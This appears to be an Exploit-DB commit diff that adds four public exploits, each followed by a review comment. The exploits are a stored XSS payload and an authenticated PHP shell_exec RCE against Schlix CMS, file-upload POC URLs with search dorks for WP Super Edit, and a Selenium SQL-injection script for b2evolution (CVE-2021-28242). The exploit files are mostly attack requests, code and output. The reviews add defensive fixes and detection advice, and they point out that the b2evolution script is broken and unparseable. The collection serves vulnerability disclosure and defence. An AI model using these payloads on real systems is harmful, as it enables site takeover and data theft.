DB: 2021-05-07

4 changes to exploits/shellcodes

Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
b2evolution 7-2-2 - 'cf_name' SQL Injection
Offensive Security 2021-05-07 05:02:58 +00:00
parent ca3206ff78
commit 72135d9121
5 changed files with 591 additions and 0 deletions

@ -0,0 +1,182 @@
# Exploit Title: Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)
# Date: 2021-05-05
# Exploit Author: Emircan Baş
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the contacts section. Directory is '/admin/app/contact'.
3- Create a new category and type an XSS payload into the category title.
4- XSS payload will be executed when we travel to created page.
==> Vulnerable Source Code <==
<article class="main category">
<div class="media-header-full-width " style="background-image: url('https://static-demo.schlix.website/images/static/sample1/header/header_img_10.jpg');">
<div class="media-header-title container d-flex h-100">
<div class="row align-self-center w-100">
<div class="col-8 mx-auto">
<div class="text-center">
<h1 class="item title" itemprop="headline">&#039;"><script>alert(1)</script></h1> # OUR PAYLOAD IS NON-EXECUTEABLE
</div>
</div>
</div>
</div>
</div>
<div class="breadcrumb-bg">
<div class="container">
<div class="breadcrumb-container"><ol class="breadcrumb"><li class="breadcrumb-item"><a class="breadcrumb-home" href="/cms">
<i class="fa fa-home"></i></a></li><li class="breadcrumb-item"><a href="/cms/contacts/">Contacts</a></li><li class="breadcrumb-item">
<a href="/cms/contacts/script-alert-2-script/"><script>alert(1)</script></a></li></ol></div></div> # EXECUTED PLACE
</div>
==> HTTP Request <==
POST /admin/app/contacts?action=savecategory HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------280033592236615772622294478489
Content-Length: 4146
Origin: (ORIGIN)
Connection: close
Referer: (REFERER)
Cookie: contacts_currentCategory=6; scx2f1afdb4b86ade4919555d446d2f0909=gi3u57kmk34s77f1fngigm1k1b; gusrinstall=rt9kps56aasmd8445f7ufr7mva; schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="_csrftoken"
49feefcd2b917b9855cd55c8bd174235fa5912e4
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cid"
6
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="parent_id"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="guid"
ee34f23a-7167-a454-8576-20bef7575c15
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="title"
<script>alert(1)</script>
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="status"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="virtual_filename"
script-alert-1-script
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="summary"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_description"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="meta_key"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="tags"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_available"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="date_expiry"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="items_per_page"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_pagetitle
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_child_categories
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
display_items
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[]"
__null__
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[child_categories_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="options[items_sortby]"
date_created
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read_everyone"
everyone
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
2
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_read[]"
3
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="permission_write[]"
1
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_selection"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_upload"; filename=""
Content-Type: application/octet-stream
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_path"
-----------------------------280033592236615772622294478489
Content-Disposition: form-data; name="cmh_media_url"
-----------------------------280033592236615772622294478489--
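
Review bot: The tutorial's step 2 names the directory '/admin/app/contact' while the captured request posts to /admin/app/contacts?action=savecategory; the two should agree, as should the `virtual_filename` sent ('script-alert-1-script') and the breadcrumb href shown ('/cms/contacts/script-alert-2-script/'). The captured markup also pins down where the defect is, and the write-up should say so: the same title is entity-encoded inside the `<h1 class="item title">` (the author marks it non-executable there) but emitted raw inside the breadcrumb anchor (marked 'EXECUTED PLACE'), so the fix is output encoding at the breadcrumb template sink, not filtering of the title on input, and a regression test should cover that sink specifically. Lastly, the request still carries a live-looking session cookie and `_csrftoken` value from the test install; redact them the way HOST, ORIGIN and REFERER already are.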

@ -0,0 +1,295 @@
# Exploit Title: Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)
# Date: 2021-05-06
# Exploit Author: Eren Saraç
# Vendor Homepage: https://www.schlix.com/
# Software Link: https://www.schlix.com/downloads/schlix-cms/schlix-cms-v2.2.6-6.zip
# Version: 2.2.6-6
# Tested on: Windows & WampServer
==> Tutorial <==
1- Login with your account.
2- Go to the block management section. Directory is '/admin/app/core.blockmanager'.
3- Create a new category.
4- Download the 'mailchimp' extension from here. => https://github.com/calip/app_mailchimp
5- Open the 'packageinfo.inc' file. It is in '/blocks/mailchimp' directory.
6- Paste this PHP code below and save it.
#####################################
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
#####################################
7- Compress the file to ZIP and rename it 'combo_mailchimp-1_0_1'.
8- Install a package to created category and enter the installed 'mailchimp' extension.
9- Click the 'About' tab and our php code will be executed.
==> Vulnerable 'packageinfo.inc' file. (mailchimp Extension) <==
<?php
$name = 'mailchimp';
$type = 'block';
$guid = '860e9d79-c5d0-37e4-894e-cdc19d06c7c3';
$version = '1.0';
$license = 'MIT';
$description = 'Mailchimp is the leading email marketing platform, that lets you send out fully customized email and newsletter campaigns to your subscribers. It is an imperative tool to build and follow through on your sales funnel, and helps you create and maintain lasting relations with your site visitors and customers.';
$author = 'Alip';
$url = 'https://github.com/calip/app_mailchimp';
$email = 'asalip.putra@gmail.com';
$copyright = 'Copyright &copy;2019 calip';
$command = shell_exec('netstat -an');
echo "<pre>$command</pre>";
?>
==> HTTP Request (ZIP Extension Installation) <==
POST /admin/app/core.blockmanager?&ajax=1&action=install HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Schlix-Ajax: 1
Content-Type: multipart/form-data; boundary=---------------------------29322337091578227221515354130
Content-Length: 51585
Origin: http(s)://(ORIGIN)
Connection: close
Referer: http(s)://(REFERER)/admin/app/core.blockmanager
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2;
schlix_frontendedit_control_showblock=-2; schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="_csrftoken"
a3b9a0da8d6be08513f60d1744e2642df0702ff7
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload"; filename="combo_mailchimp-1_0_1.zip"
Content-Type: application/x-zip-compressed
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
#############################################
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="MAX_FILE_SIZE"
2097152
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__total_file_size"
0
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="zipfileupload__max_file_count"
20
-----------------------------29322337091578227221515354130
Content-Disposition: form-data; name="password"
# Your ACC Password.
-----------------------------29322337091578227221515354130--
==> HTTP Request (RCE - About Tab) <==
GET /admin/app/core.blockmanager?action=edititem&id=44 HTTP/1.1
Host: (HOST)
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http(s)://(HOST)/
Connection: close
Cookie: core-blockmanager_currentCategory=27; scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; schlix_frontendedit_control_showblock=-2;
schlix_frontendedit_control_showhide=-2; schlix_frontendedit_control_showdoc=-2
Upgrade-Insecure-Requests: 1
==> HTTP Response (RCE - About Tab) <==
HTTP/1.1 200 OK
Date: Wed, 05 May 2021 21:49:24 GMT
Server: Apache/2.4.46 (Win64) PHP/7.3.21
X-Powered-By: PHP/7.3.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: scx2f1afdb4b86ade4919555d446d2f0909=1pv1irnlepvjojieipevvn65p2; expires=Wed, 05-May-2021 23:49:24 GMT; Max-Age=7200; path=/cms/; domain=127.0.0.1; HttpOnly; SameSite=lax
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 49575
<!DOCTYPE html>
<html>
<body>
<div id="tab_options" class="schlixui-childtab">
<pre>
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3307 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5040 0.0.0.0:0 LISTENING
TCP 0.0.0.0:7680 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING
TCP 0.0.0.0:50296 0.0.0.0:0 LISTENING
TCP 127.0.0.1:80 127.0.0.1:58843 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58853 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58854 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58859 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58860 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58865 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58868 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58883 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58893 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58894 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58899 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58902 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58908 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58918 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58919 TIME_WAIT
TCP 127.0.0.1:80 127.0.0.1:58924 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58886 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58887 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58888 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58891 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58905 CLOSE_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58907 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58911 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58913 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58915 TIME_WAIT
TCP 127.0.0.1:8080 127.0.0.1:58916 TIME_WAIT
TCP 127.0.0.1:58424 127.0.0.1:58425 ESTABLISHED
TCP 127.0.0.1:58425 127.0.0.1:58424 ESTABLISHED
TCP 127.0.0.1:58435 127.0.0.1:58436 ESTABLISHED
TCP 127.0.0.1:58436 127.0.0.1:58435 ESTABLISHED
TCP 127.0.0.1:58565 127.0.0.1:58566 ESTABLISHED
TCP 127.0.0.1:58566 127.0.0.1:58565 ESTABLISHED
TCP 127.0.0.1:58639 127.0.0.1:58640 ESTABLISHED
TCP 127.0.0.1:58640 127.0.0.1:58639 ESTABLISHED
TCP 169.254.22.167:139 0.0.0.0:0 LISTENING
TCP 169.254.224.26:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:49500 95.101.14.77:443 ESTABLISHED
TCP 192.168.1.8:57059 162.159.129.235:443 ESTABLISHED
TCP 192.168.1.8:57902 162.159.138.234:443 ESTABLISHED
TCP 192.168.1.8:58453 44.235.189.138:443 ESTABLISHED
TCP 192.168.1.8:58626 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58627 162.159.133.234:443 ESTABLISHED
TCP 192.168.1.8:58699 162.159.135.232:443 ESTABLISHED
TCP 192.168.1.8:58841 20.44.232.74:443 ESTABLISHED
TCP 192.168.1.8:58942 162.159.138.232:443 ESTABLISHED
TCP 192.168.1.8:58951 138.68.92.190:443 ESTABLISHED
TCP 192.168.1.8:60549 51.103.5.159:443 ESTABLISHED
TCP 192.168.1.8:60610 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60611 104.66.70.197:443 ESTABLISHED
TCP 192.168.1.8:60612 217.31.233.104:443 CLOSE_WAIT
TCP [::]:80 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:3306 [::]:0 LISTENING
TCP [::]:3307 [::]:0 LISTENING
TCP [::]:7680 [::]:0 LISTENING
TCP [::]:49664 [::]:0 LISTENING
TCP [::]:49665 [::]:0 LISTENING
TCP [::]:49666 [::]:0 LISTENING
TCP [::]:49667 [::]:0 LISTENING
TCP [::]:49668 [::]:0 LISTENING
TCP [::]:50296 [::]:0 LISTENING
TCP [::1]:3306 [::1]:58845 TIME_WAIT
TCP [::1]:3306 [::1]:58856 TIME_WAIT
TCP [::1]:3306 [::1]:58857 TIME_WAIT
TCP [::1]:3306 [::1]:58858 TIME_WAIT
TCP [::1]:3306 [::1]:58932 TIME_WAIT
TCP [::1]:3306 [::1]:58935 TIME_WAIT
TCP [::1]:3306 [::1]:58940 TIME_WAIT
TCP [::1]:3306 [::1]:58950 TIME_WAIT
TCP [::1]:3306 [::1]:58953 ESTABLISHED
TCP [::1]:3306 [::1]:58954 ESTABLISHED
TCP [::1]:49485 [::1]:49486 ESTABLISHED
TCP [::1]:49486 [::1]:49485 ESTABLISHED
TCP [::1]:49669 [::]:0 LISTENING
TCP [::1]:58844 [::1]:3306 TIME_WAIT
TCP [::1]:58845 [::1]:3306 TIME_WAIT
TCP [::1]:58855 [::1]:3306 TIME_WAIT
TCP [::1]:58856 [::1]:3306 TIME_WAIT
TCP [::1]:58857 [::1]:3306 TIME_WAIT
TCP [::1]:58858 [::1]:3306 TIME_WAIT
TCP [::1]:58861 [::1]:3306 TIME_WAIT
TCP [::1]:58862 [::1]:3306 TIME_WAIT
TCP [::1]:58863 [::1]:3306 TIME_WAIT
TCP [::1]:58864 [::1]:3306 TIME_WAIT
TCP [::1]:58866 [::1]:3306 TIME_WAIT
TCP [::1]:58867 [::1]:3306 TIME_WAIT
TCP [::1]:58869 [::1]:3306 TIME_WAIT
TCP [::1]:58870 [::1]:3306 TIME_WAIT
TCP [::1]:58884 [::1]:3306 TIME_WAIT
TCP [::1]:58885 [::1]:3306 TIME_WAIT
TCP [::1]:58929 [::1]:3306 TIME_WAIT
TCP [::1]:58930 [::1]:3306 TIME_WAIT
TCP [::1]:58931 [::1]:3306 TIME_WAIT
TCP [::1]:58932 [::1]:3306 TIME_WAIT
TCP [::1]:58934 [::1]:3306 TIME_WAIT
TCP [::1]:58935 [::1]:3306 TIME_WAIT
TCP [::1]:58939 [::1]:3306 TIME_WAIT
TCP [::1]:58940 [::1]:3306 TIME_WAIT
TCP [::1]:58946 [::1]:3306 TIME_WAIT
TCP [::1]:58947 [::1]:3306 TIME_WAIT
TCP [::1]:58949 [::1]:3306 TIME_WAIT
TCP [::1]:58950 [::1]:3306 TIME_WAIT
TCP [::1]:58953 [::1]:3306 ESTABLISHED
TCP [::1]:58954 [::1]:3306 ESTABLISHED
UDP 0.0.0.0:5050 *:*
UDP 0.0.0.0:5353 *:*
UDP 0.0.0.0:5355 *:*
UDP 0.0.0.0:53240 *:*
UDP 0.0.0.0:53241 *:*
UDP 127.0.0.1:1900 *:*
UDP 127.0.0.1:62353 *:*
UDP 127.0.0.1:63129 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
UDP 192.168.1.8:1900 *:*
UDP 192.168.1.8:2177 *:*
UDP 192.168.1.8:63128 *:*
UDP [::]:5353 *:*
UDP [::]:5355 *:*
UDP [::1]:1900 *:*
UDP [::1]:63125 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:1900 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:2177 *:*
UDP [fe80::e4d5:62f5:da3:2dae%21]:63124 *:*
</pre>
<div class="content">
<div class="row">
<div class="col-xs-12">
<div class="text-center">
<h1>mailchimp</h1>
<p>v1.0</p><p>Author: <a href="mailto:asalip.putra@gmail.com">Alip</a></p>
<p>Web: <a href="https://github.com/calip/app_mailchimp">https://github.com/calip/app_mailchimp</a></p>
<p><a href="/cms/admin/app/core.blockmanager?action=uninstall&name=mailchimp"><i class="fa fa-times-circle"></i>Uninstall</a></p>
</div>
</div>
</div>
</div>
</div>
</body>
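
Review bot: The write-up should state the privilege this needs: every step runs as an authenticated administrator inside core.blockmanager, and the install request even re-submits the account password in the `password` field, so this is an admin-only path and the 'Remote Code Execution' severity should be qualified accordingly (installing a block package that ships PHP is what the installer is for). Saying that also points at the mitigation and detection handle: restrict who may install packages, and alert on new or modified `packageinfo.inc` files under `/blocks/`, since that file is plain PHP and, per step 9, runs when the About tab renders. Two smaller points: step 7 says to name the ZIP 'combo_mailchimp-1_0_1' while the package's `$version` is '1.0'; and the pasted `netstat -an` output, the session cookie and the `_csrftoken` value come from the author's own machine (LAN address 192.168.1.8 and its outbound peers) and should be trimmed to a few lines, as HOST and ORIGIN already are.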

@ -0,0 +1,27 @@
# Title: Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload
# Author: h4shur
# date: 2021-05-06
# Vendor Homepage: https://wordpress.org
# Software Link: https://wordpress.org/plugins/wp-super-edit/
# Version : 2.5.4 and earlier
# Tested on: Windows 10 & Google Chrome
# Category : Web Application Bugs
# Dork :
# inurl:"wp-content/plugins/wp-super-edit/superedit/"
# inurl:"wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/"
### Note:
# 1. Technical Description:
This plugin allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step.The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
# 2. Technical Description:
WordPress Plugin "wp-super-edit" allows the attacker to upload or transfer files of dangerous types that can be automatically processed within the product's environment. This vulnerability is caused by FCKeditor in this plugin. Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker accomplish the first step. The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
### POC:
* Exploit 1 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/browser.html
* Exploit 2 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/connectors/test.html
* Exploit 3 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/upload/test.html
* Exploit 4 : site.com/wp-content/plugins/wp-super-edit/superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/browser/default/frmupload.html
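
Review bot: Sections '1. Technical Description' and '2. Technical Description' are the same paragraph repeated, the second differing only by the plugin name and the FCKeditor sentence; keep one. The POC lists four URLs to FCKeditor's bundled filemanager pages (browser.html, connectors/test.html, upload/test.html, frmupload.html) but no upload request or server response, so the 'Remote File Upload' claim is not evidenced here; add the request that stores a file and the response or resulting path so readers can reproduce it and defenders can verify a fix. The paths themselves give the mitigation and the detection rule: remove or deny web access to `superedit/tinymce_plugins/mse/fckeditor/editor/filemanager/`, and search access logs for requests under it. Finally, the header says 'Version : 2.5.4 and earlier' while the title says 2.5.4; align them.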

exploits/php/webapps/49840.py Executable file
@ -0,0 +1,83 @@
# Exploit Title: b2evolution 7-2-2 - 'cf_name' SQL Injection
# Author: @nu11secur1ty
# Testing and Debugging: @nu11secur1ty
# Date: 05.06.2021
# Vendor: https://b2evolution.net/
# Link: https://b2evolution.net/downloads/7-2-2
# CVE: CVE-2021-28242
# Proof: https://streamable.com/x51kso
[+] Exploit Source:
#!/usr/bin/python3
# Author: @nu11secur1ty
# CVE-2021-28242
from selenium import webdriver
import time
# Vendor: https://typo3.org/
website_link="
http://192.168.1.3/b2evolution/index.php?disp=login&redirect_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&return_to=%2Fb2evolution%2Findex.php%3Fblog%3D2&source=menu%20link"
# enter your login username
username="admin"
# enter your login password
password="FvsDq7fmHvWF"
#enter the element for username input field
element_for_username="x"
#enter the element for password input field
element_for_password="q"
#enter the element for submit button
element_for_submit="login_action[login]"
browser = webdriver.Chrome() #uncomment this line,for chrome users
#browser = webdriver.Safari() #for macOS users[for others use chrome vis
chromedriver]
#browser = webdriver.Firefox() #uncomment this line,for chrome users
browser.get((website_link))
try:
username_element = browser.find_element_by_name(element_for_username)
username_element.send_keys(username)
password_element = browser.find_element_by_name(element_for_password)
password_element.send_keys(password)
signInButton = browser.find_element_by_name(element_for_submit)
signInButton.click()
# Exploit vulnerability MySQL obtain sensitive database information by
injecting SQL commands into the "cf_name" parameter
time.sleep(7)
# Receaving sensitive info for evo_users
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT+*+FROM+%60evo_users%60+ORDER+BY+%60evo_&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_blogs
browser.get(("
http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_blogs`%20ORDER%20BY%20`evo_blogs`.`blog_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
# Receaving sensitive info for evo_section
browser.get(("http://192.168.1.3/b2evolution/evoadm.php?colselect_submit=&cf_name=SELECT%20*%20FROM%20`evo_section`%20ORDER%20BY%20`evo_section`.`sec_name`&cf_owner=&cf_type=&blog_filter_preset=custom&ctrl=collections"))
time.sleep(7)
browser.close()
print("At the time, of the exploit, you had to see information about the
tables...\n")
except Exception:
#### This exception occurs if the element are not found in the webpage.
print("Sorry, your exploit is not working for some reasons...")
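
Review bot: As committed, the script does not parse: `website_link="` on one line with the URL on the next is an unterminated string literal, the same split occurs at `browser.get(("` before the evo_blogs URL, the final `print(` string breaks across two lines, and two comments spill a bare continuation (`chromedriver]` and `injecting SQL commands into the "cf_name" parameter`) onto lines of their own outside the comment. Each of those must be a single line. Further points: the in-code comment `# Vendor: https://typo3.org/` contradicts the header (`https://b2evolution.net/`) and looks copied from another exploit; the admin credentials, the 192.168.1.3 address and the element names are hard-coded, and `find_element_by_name` is deprecated in Selenium 4 and removed in 4.3, so the script only runs as-is in the author's lab with an old Selenium; and the `except Exception:` branch swallows every error with a generic message, which hides the parse and driver problems above. For defenders, the three `browser.get` lines show the signature to look for: a `cf_name` value starting with `SELECT * FROM` sent to `evoadm.php?ctrl=collections`, which is easy to match in a WAF rule or log search while updating past 7-2-2 (CVE-2021-28242).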

@ -44003,3 +44003,7 @@ id,file,description,date,author,type,platform,port
49834,exploits/multiple/webapps/49834.js,"Markright 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49835,exploits/multiple/webapps/49835.js,"Markdownify 1.2.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49836,exploits/multiple/webapps/49836.js,"Anote 1.0 - XSS to RCE",2021-05-05,TaurusOmar,webapps,multiple,
49837,exploits/multiple/webapps/49837.txt,"Schlix CMS 2.2.6-6 - 'title' Persistent Cross-Site Scripting (Authenticated)",2021-05-06,"Enes Özeser",webapps,multiple,
49838,exploits/multiple/webapps/49838.txt,"Schlix CMS 2.2.6-6 - Remote Code Execution (Authenticated)",2021-05-06,"Eren Saraç",webapps,multiple,
49839,exploits/php/webapps/49839.txt,"Wordpress Plugin WP Super Edit 2.5.4 - Remote File Upload",2021-05-06,h4shur,webapps,php,
49840,exploits/php/webapps/49840.py,"b2evolution 7-2-2 - 'cf_name' SQL Injection",2021-05-06,nu11secur1ty,webapps,php,
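
Review bot: The index row for 49837 credits "Enes Özeser", but the file header added in this same commit says `# Exploit Author: Emircan Baş`; one of the two is wrong and should be reconciled before merge. The date for 49837 also disagrees (file header 2021-05-05, CSV 2021-05-06), and 49840's header uses 05.06.2021 rather than the YYYY-MM-DD form the other files and the CSV use. Since files.csv is what search and tooling index, it should match the file headers, and the header dates should be normalised to one format.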
